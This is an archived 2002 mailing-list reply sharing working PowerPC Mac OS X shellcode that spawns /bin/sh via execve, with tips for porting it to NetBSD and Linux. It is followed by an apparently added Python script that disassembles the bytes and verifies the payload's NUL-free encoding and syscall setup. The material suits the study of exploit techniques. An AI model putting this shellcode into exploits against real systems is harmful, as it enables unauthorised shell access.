Vulnerability Development mailing list archives

Re: OS X Shell Code


From: ghandi <ghandi () dopesquad net>
Date: Thu, 10 Jan 2002 17:42:31 -0700 (MST)

Here is some shellcode that I wrote a while back.  It was written and
tested on a G3 running OSX 10.0.x - 10.1.x.  IIRC it worked fine on NetBSD
also (same syscall number for execve) and fine on Linux with a changed
system call number.  The assembly language source and header files are
available at http://www.dopesquad.net/security.

/* PPC MacOS X (maybe others) shellcode
 *
 * ghandi <ghandi () mindless com>
 */
char shellcode[] =
  "\x7c\xa5\x2a\x79"  /* xor.   r5, r5, r5    ; r5 = NULL           */
  "\x40\xa2\xff\xfd"  /* bnel   shellcode                           */
  "\x7f\xe8\x02\xa6"  /* mflr   r31                                 */
  "\x3b\xff\x01\x30"  /* addi   r31, r31, 268+36                    */
  "\x38\x7f\xfe\xf4"  /* addi   r3, r31, -268 ; r3 = path           */
  "\x90\x61\xff\xf8"  /* stw    r3, -8(r1)    ; argv[0] = path      */
  "\x90\xa1\xff\xfc"  /* stw    r5, -4(r1)    ; argv[1] = NULL      */
  "\x38\x81\xff\xf8"  /* subi   r4, r1, 8     ; r4 = {path, 0}      */
  "\x3b\xc0\x76\x01"  /* li     r30, 30209                          */
  "\x7f\xc0\x4e\x70"  /* srawi  r0, r30, 9                          */
  "\x44\xff\xff\x02"  /* sc                   ; execve(r3, r4, r5)  */
  "/bin/sh"
;


--
           ghandi / ghandi () mindless com / www.dopesquad.net
       "Bein' Crazy is the least of my worries." - Jack Kerouac
          C439 2B06 D8D2 A2D8 1ABB  0A55 A61D 9057 63F5 9B1F


On Thu, 10 Jan 2002, Josha Bronson wrote:

Greetings VulnDev,

Anyone have some pointers (hah.. punny..) to shellcode examples for OS X?

Thanks in advance,
--
Josha Bronson
dmuz () angrypacket com
AngryPacket Security
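To see what the posted bytes actually do before anyone runs them, here is an added analysis script. It is not part of the original message or of the dopesquad.net sources; the function and variable names are mine. It splits the array into big-endian PowerPC words, decodes only the instruction forms that occur in it, and checks three properties the shellcode depends on: the body contains no 0x00 byte, the li/srawi pair leaves 59 (execve on OS X and NetBSD) in r0 without a NUL byte in the encoding (a plain "li r0, 59" would encode as 0x3800003b), and the address arithmetic after the bnel lands exactly on "/bin/sh". The bnel is never taken (xor. r5,r5,r5 sets CR0[EQ]), but a conditional branch with LK=1 still writes the address of the following instruction into LR, which is what mflr picks up.

```python
"""Decode the PPC execve shellcode posted above and check the properties
it relies on. Added analysis example, not code from the original post;
it only understands the instruction forms that appear in that array."""
import struct

# Bytes copied from the posted C array. The C compiler appends the 0x00
# that terminates "/bin/sh"; the body itself must stay NUL-free.
SHELLCODE = (
    b"\x7c\xa5\x2a\x79" b"\x40\xa2\xff\xfd" b"\x7f\xe8\x02\xa6"
    b"\x3b\xff\x01\x30" b"\x38\x7f\xfe\xf4" b"\x90\x61\xff\xf8"
    b"\x90\xa1\xff\xfc" b"\x38\x81\xff\xf8" b"\x3b\xc0\x76\x01"
    b"\x7f\xc0\x4e\x70" b"\x44\xff\xff\x02" b"/bin/sh"
)
N_INSNS = 11  # everything before "/bin/sh" is code


def s16(v):
    """Sign-extend a 16-bit immediate."""
    return v - 0x10000 if v & 0x8000 else v


def decode(word):
    """Render one 32-bit big-endian PowerPC word as a mnemonic string."""
    op = word >> 26
    rd, ra = (word >> 21) & 31, (word >> 16) & 31
    imm = s16(word & 0xFFFF)
    if op == 14:                                  # addi, or li when rA is 0
        return f"li r{rd}, {imm}" if ra == 0 else f"addi r{rd}, r{ra}, {imm}"
    if op == 36:                                  # stw rS, d(rA)
        return f"stw r{rd}, {imm}(r{ra})"
    if op == 16:                                  # bc: BO in rd, BI in ra
        bd, lk = s16(word & 0xFFFC), word & 1
        # BO=001zy with BI=2 is "branch if CR0[EQ] is false", i.e. bne
        name = "bne" if (rd >> 2) == 1 and ra == 2 else f"bc {rd}, {ra},"
        return f"{name}{'l' if lk else ''} {bd:+d}"
    if op == 17:                                  # sc (reserved bits ignored)
        return "sc"
    if op == 31:
        xo, rb = (word >> 1) & 0x3FF, (word >> 11) & 31
        if xo == 316:                             # xor[.] rA, rS, rB
            return f"xor{'.' if word & 1 else ''} r{ra}, r{rd}, r{rb}"
        if xo == 339:                             # mfspr; SPR 8 is the LR
            spr = (rb << 5) | ra
            return f"mflr r{rd}" if spr == 8 else f"mfspr r{rd}, {spr}"
        if xo == 824:                             # srawi rA, rS, SH
            return f"srawi r{ra}, r{rd}, {rb}"
    return f".long 0x{word:08x}"


def words_of(code, n_insns=N_INSNS):
    return struct.unpack(f">{n_insns}I", code[: 4 * n_insns])


def disassemble(code, n_insns=N_INSNS):
    return [decode(w) for w in words_of(code, n_insns)]


def analyze(code, n_insns=N_INSNS):
    """Check the three properties the shellcode depends on."""
    words = words_of(code, n_insns)
    # 1. A 0x00 byte would truncate a strcpy-style copy of the payload.
    nul_free = b"\x00" not in code
    # 2. Follow li/srawi so the syscall number in r0 can be read off.
    regs = {}
    for w in words:
        op, rd, ra = w >> 26, (w >> 21) & 31, (w >> 16) & 31
        if op == 14 and ra == 0:                  # li rD, imm
            regs[rd] = s16(w & 0xFFFF)
        elif op == 31 and ((w >> 1) & 0x3FF) == 824:   # srawi rA, rS, SH
            regs[ra] = regs[rd] >> ((w >> 11) & 31)
    # 3. bnel stores the next instruction's offset (8) in LR even when not
    #    taken; r31 = LR + 304 and r3 = r31 - 268 must point at the path.
    lr = 8
    r31 = lr + s16(words[3] & 0xFFFF)
    r3 = r31 + s16(words[4] & 0xFFFF)
    path = code[r3:].split(b"\x00")[0].decode()
    return {"nul_free": nul_free, "syscall": regs.get(0),
            "path_offset": r3, "path": path}


if __name__ == "__main__":
    for off, text in enumerate(disassemble(SHELLCODE)):
        print(f"{off * 4:3d}: {text}")
    print(analyze(SHELLCODE))
```

On the posted bytes the script reports syscall 59 and a path offset of 44, which is the byte right after the eleventh instruction. Swapping in a different `li` immediate (the change the message mentions for Linux) shows up immediately in the `syscall` field, so the same check works on the Linux variant.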


